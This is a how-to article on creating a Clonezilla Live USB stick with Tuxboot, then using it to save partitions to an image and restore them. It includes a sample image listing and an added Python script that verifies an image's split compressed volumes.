Clonezilla can also copy unsupported filesystems with the dd command, which copies blocks rather than files, so it doesn’t need to understand filesystems. So, the short story is Clonezilla can copy anything. (A quick note on blocks: disk sectors are the smallest addressable storage units on hard disks, and blocks are logical data structures made up of single or multiple sectors.)

Clonezilla comes in two versions: Clonezilla Live and Clonezilla Server Edition (SE). Clonezilla live is ace for cloning single computers to a local storage device or network share. Clonezilla SE is for larger deployments, and fast multicast cloning an entire network of PCs at once. Clonezilla SE is a wonderful bit of software that we shall cover in the future. Today we shall create a Clonezilla Live USB stick, clone something, and restore it.

Clonezilla and Tuxboot

When you visit the download page you’ll see Stable and Alternative Stable releases. There are also Testing releases, which I recommend if you’re interested in helping to improve Clonezilla. Stable is based on Debian and includes no non-Free software. Alternative Stable is based on Ubuntu, includes some non-Free firmwares, and it supports UEFI Secure Boot.

After you download Clonezilla, install Tuxboot to copy Clonezilla to a USB stick. Tuxboot is a modification of Unetbootin that supports Clonezilla; you can’t use Unetbootin because it won’t work. Installing Tuxboot is a bit of a pain, though Ubuntu users can install Tuxboot the easy way from a personal packages archive (PPA):

$ sudo apt-add-repository ppa:thomas.tsai/ubuntu-tuxboot
$ sudo apt-get update
$ sudo apt-get install tuxboot

If you’re not running Ubuntu and your Linux distribution doesn’t include a packaged version of Tuxboot, download the source tarball and follow the instructions in the README.txt file to compile and install it.

Once you get Tuxboot installed, use it to create your nice live bootable Clonezilla USB stick. First create a FAT32 partition of at least 200 megabytes; figure 1 (above) shows how it’s done in GParted. I like to use labels, like “clonezilla”, so I know what it is. This example shows a 2GB stick formatted as a single partition.

Then fire up Tuxboot (figure 2). Check “Pre-downloaded” and click the button with the ellipsis to select your Clonezilla file. It should find your USB stick automatically, and you should check the partition number to make sure it found the right one. In my example that is /dev/sdd1. Click OK, and when it’s finished click Exit. It asks you if you want to reboot now, but don’t worry because it won’t. Now you have a nice portable Clonezilla USB stick you can use almost anywhere.

Figure 2: Tuxboot

Creating a Drive Image

Boot up your Clonezilla USB stick on the computer that you want to backup, and the first thing you’ll see is a normal-looking boot menu. Boot to the default entry. You’ll be asked language and keyboard questions, and when you arrive at the Start Clonezilla menu select Start Clonezilla. In the next menu select device_image, then go to the next screen.

This screen is a little confusing, with options for local_dev, ssh_server, samba_server, and nfs_server. This is where you select the location for your backup image to be copied to. If you choose local_dev, then you’ll need a local partition with enough room to store your image. An attached USB hard drive is a nice fast and easy option. If you choose any of the server options you’ll need a wired Ethernet connection, the IP address of your server, and your login. I’ll use a local partition, which means selecting local_dev.

When you select local_dev Clonezilla scans all of your locally-attached storage, including hard disks and USB storage devices, and makes a list of your partitions. Select the one you want to store your new image in, and then it asks which directory to use and shows you a list. Select your desired directory, and the next screen shows all of your mounts and used/available space. Press Enter, and the next screen gives you the option of Beginner or Expert mode. I choose Beginner.

In the next screen you can choose savedisk, which creates an image of an entire hard disk, or save_parts, which allows you to select individual partitions. I want to select partitions.

The next screen asks for a name for your new image. After accepting the default or entering your own name, go to the next screen. Clonezilla scans your partitions and creates a checklist so you can pick the ones you want to copy. After making your selections, the next screen gives you the option to do a filesystem check and repair. I’m impatient, so I skip this part.

The next screen asks if you want Clonezilla to check your newly-created image to make sure it is restorable. I always say yes. Next, it gives you a command-line hint in case you ever want to use the command-line instead of the GUI, and you must press Enter again. You get one more confirmation, and then type y for Yes to make the copy.

You get to watch a nice red, white, and blue progress screen while Clonezilla creates your new image (figure 3).

Figure 3: Clonezilla creating the image

When it’s all finished press Enter and then select reboot, and remember to remove your Clonezilla USB stick. Boot up your computer normally, and go look at your nice new Clonezilla image. You should see something like this:

$ ls -l /2014-08-07-11-img/
total 1241448
-rw-r--r-- 1 root root       1223 Aug  7 04:22 blkdev.list
-rw-r--r-- 1 root root        636 Aug  7 04:22 blkid.list
-rw-r--r-- 1 root root       3658 Aug  7 04:24 clonezilla-img
-rw-r--r-- 1 root root      12379 Aug  7 04:24 Info-dmi.txt
-rw-r--r-- 1 root root      22685 Aug  7 04:24 Info-lshw.txt
-rw-r--r-- 1 root root       3652 Aug  7 04:24 Info-lspci.txt
-rw-r--r-- 1 root root        171 Aug  7 04:24 Info-packages.txt
-rw-r--r-- 1 root root         86 Aug  7 04:24 Info-saved-by-cmd.txt
-rw-r--r-- 1 root root          5 Aug  7 04:24 parts
-rw------- 1 root root 1270096769 Aug  7 04:24 sda6.ext4-ptcl-img.gz.aa
-rw-r--r-- 1 root root         37 Aug  7 04:22 sda-chs.sf
-rw-r--r-- 1 root root    1048064 Aug  7 04:22 sda-hidden-data-after-mbr
-rw-r--r-- 1 root root        512 Aug  7 04:22 sda-mbr
-rw-r--r-- 1 root root        750 Aug  7 04:22 sda-pt.parted
-rw-r--r-- 1 root root        625 Aug  7 04:22 sda-pt.parted.compact
-rw-r--r-- 1 root root        514 Aug  7 04:22 sda-pt.sf
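The listing shows how the image is stored: a parts file naming the saved partitions, and for each of them a gzip-compressed partclone stream split into volumes (sda6.ext4-ptcl-img.gz.aa, .ab, ...). A restore concatenates the volumes in order and pipes them through gunzip, so a quick check you can run from any Linux box is to confirm that the volumes are all present and the concatenated stream decompresses. The following is an added example, not Clonezilla's own code: it builds a constructed stand-in image directory (a split gzip stream, no real partition data) so it runs offline, and the function names are this example's own.

```python
"""Sanity-check a Clonezilla image directory before trusting it: every partition
named in 'parts' must have its gzip-compressed partclone volumes
(<part>.<fs>-ptcl-img.gz.aa, .ab, ...) and their concatenation must decompress
cleanly, which is what the restore step feeds to gunzip.

Added example, not Clonezilla's own code. The demo builds a constructed stand-in
image directory; file naming follows the directory listing shown above.
"""
import glob
import gzip
import os
import random
import tempfile
import zlib


def volume_files(image_dir, part):
    """Split volumes for one partition, in .aa, .ab, ... order (the order 'cat' needs)."""
    return sorted(glob.glob(os.path.join(image_dir, f"{part}.*-ptcl-img.gz.*")))


def check_image(image_dir):
    """Return {part: (volume_count, decompresses_ok)} for every partition in 'parts'."""
    with open(os.path.join(image_dir, "parts")) as fh:
        parts = fh.read().split()
    report = {}
    for part in parts:
        files = volume_files(image_dir, part)
        if not files:
            report[part] = (0, False)
            continue
        stream = b"".join(open(path, "rb").read() for path in files)  # cat part.*.gz.*
        try:
            gzip.decompress(stream)
            ok = True
        except (OSError, EOFError, zlib.error):   # bad header, truncation, corrupt data
            ok = False
        report[part] = (len(files), ok)
    return report


def build_sample_image(image_dir, part="sda6", fs="ext4", size=5000, chunk=2048):
    """Constructed stand-in: gzip a deterministic pseudo-random payload and split it
    into 2-letter volumes the way Clonezilla's split step does."""
    rng = random.Random(1)
    payload = bytes(rng.getrandbits(8) for _ in range(size))   # incompressible -> several volumes
    blob = gzip.compress(payload)
    with open(os.path.join(image_dir, "parts"), "w") as fh:
        fh.write(part + "\n")
    letters = "abcdefghijklmnopqrstuvwxyz"
    for index, start in enumerate(range(0, len(blob), chunk)):
        suffix = letters[index // 26] + letters[index % 26]
        with open(os.path.join(image_dir, f"{part}.{fs}-ptcl-img.gz.{suffix}"), "wb") as fh:
            fh.write(blob[start:start + chunk])
    return image_dir


def demo():
    """Build a sample image, check it, then remove the last volume and check again.
    Returns (report_intact, report_damaged)."""
    image_dir = tempfile.mkdtemp(prefix="clonezilla-demo-")
    build_sample_image(image_dir)
    intact = check_image(image_dir)
    os.remove(volume_files(image_dir, "sda6")[-1])      # simulate a lost or truncated volume
    damaged = check_image(image_dir)
    return intact, damaged


if __name__ == "__main__":
    intact, damaged = demo()
    print("intact :", intact)
    print("damaged:", damaged)
```

Point check_image at a real image directory such as /2014-08-07-11-img/ to get the same report for each saved partition; a missing or truncated volume shows up as a decompression failure long before you are standing in front of a machine that needs restoring.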

Restoring a Clonezilla Image

Restoring your image is similar to creating it. Again, boot up Clonezilla, go through the same initial steps, select device_image, and then on the local_dev screen select the location of the image that you want to restore, whether it’s on a local device or a network share. Then continue through the rest of the screens, making sure that you have the correct restore image and target locations selected.

You can learn more of Clonezilla’s amazing powers at the Clonezilla Live Documentation page.